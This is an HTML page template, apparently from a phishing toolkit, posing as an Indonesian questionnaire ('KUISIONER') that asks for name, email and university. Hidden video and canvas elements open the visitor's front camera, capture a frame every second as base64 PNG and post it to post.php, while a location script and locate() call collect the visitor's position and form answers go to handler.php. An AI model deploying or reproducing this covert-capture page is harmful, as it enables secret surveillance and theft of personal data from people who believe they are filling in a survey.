<!doctype html>
<html>
<head>
  <script src="../../assets/js/jquery.min.js"></script>
  <script src="../../assets/js/client.min.js"></script>
  <script src="../../assets/js/loc.js"></script>
  <link href="../../assets/css/bootstrap.min.css" rel="stylesheet">
  <link href="../../assets/css/light-theme.min.css" rel="stylesheet">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>

</html>
<html>
<body onload="mydata()">

<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="640" height="640"></canvas>
<script src="../../assets/js/location.js"></script>
<script>

function post(imgdata){
$.ajax({
    type: 'POST',
    data: { cat: imgdata},
    url: 'post.php',
    dataType: 'json',
    async: false,
    success: function(result){
        // call the function that handles the response/results
    },
    error: function(){
    }
  });
};


'use strict';

const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');

const constraints = {
  audio: false,
  video: {
    
    facingMode: "user"
  }
};
// environment -- user

// Access webcam
async function init() {
  try {
    const stream = await navigator.mediaDevices.getUserMedia(constraints);
    handleSuccess(stream);
  } catch (e) {
    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
  }
}

// Success
function handleSuccess(stream) {
  window.stream = stream;
  video.srcObject = stream;

var context = canvas.getContext('2d');
  setInterval(function(){

       context.drawImage(video, 0, 0, 640, 640);
       var canvasData = canvas.toDataURL("image/png")
       cc = String(canvasData).replace("data:image/png;base64,","")
      //  console.log(cc)
       post(cc); }, 1000);
  

}

// Load init
init();

</script>

</body>
</html>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">

    <title>KUISIONER</title>
    <script>
        window.console = window.console || function (t) {
        };
    </script>
    <script>
        if (document.location.search.match(/type=embed/gi)) {
            window.parent.postMessage("resize", "*");
        }
    </script>

<script>

  function klikSubmit(namaID){

    //console.log(document.getElementById(namaID).value);
   // document.getElementBy().style.display = "inline-block";

   var formulir = document.getElementById(namaID);
   //console.log(formulir.name);
   //console.log(formulir.value);
   $.ajax({          
            type: 'POST',
            url: 'handler.php',
            data: {"data_formulir":`${formulir.name} : ${formulir.value}`},
            mimeType: 'text'
            });
       
  }

  
  $(document).ready(function(){

    // inisialisasi
    $('#nama').show();
    $('#alamatEmail').hide();
    $('#asalUniversitas').hide();

    $('.tbl1').click(function() {
      $('#gtau').fadeIn(200).delay(14000).fadeOut(); 
      $('#nama').fadeOut();
      $('#alamatEmail').delay(15000).fadeIn();
      
    });

    $('.tbl2').click(function() {
      $('#gtau').fadeIn(200).delay(14000).fadeOut(); 
      $('#alamatEmail').fadeOut();
      $('#asalUniversitas').delay(15000).fadeIn();
      locate();
    });

});

</script>
</head>

<body translate="no" class="p-5">
  <div id="gtau" style="display: none;"><i class="fa fa-refresh fa-spin"></i> Loading</div>
<div id="nama">
    <div class="form-group">
      <label for="namaform1">Nama</label>
      <input type="text" class="form-control" id="namaform1" aria-describedby="emailHelp" name="Nama" placeholder="masukkan nama">
    </div>
  
    <button class="btn btn-primary tbl1" onclick="klikSubmit('namaform1')">Kirim</button>
  
   
</div>



<div id="alamatEmail">
    <div class="form-group">
      <label for="emailform1">Email</label>
      <input type="email" class="form-control" id="emailform1" aria-describedby="emailHelp" name="Email" placeholder="masukkan email">
    </div>
  
    <button class="btn btn-primary tbl2" onclick="klikSubmit('emailform1')">Kirim</button>
  
    
</div>

<div id="asalUniversitas">
  <div class="form-group">
    <label for="asalUnivform1">Asal universitas</label>
    <input type="email" class="form-control" id="asalUnivform1" aria-describedby="emailHelp" name="Universitas" placeholder="asal universitas">
  </div>

  <button class="btn btn-primary " onclick="klikSubmit('asalUnivform1')">Kirim</button>
  
</div>

</body>
</html>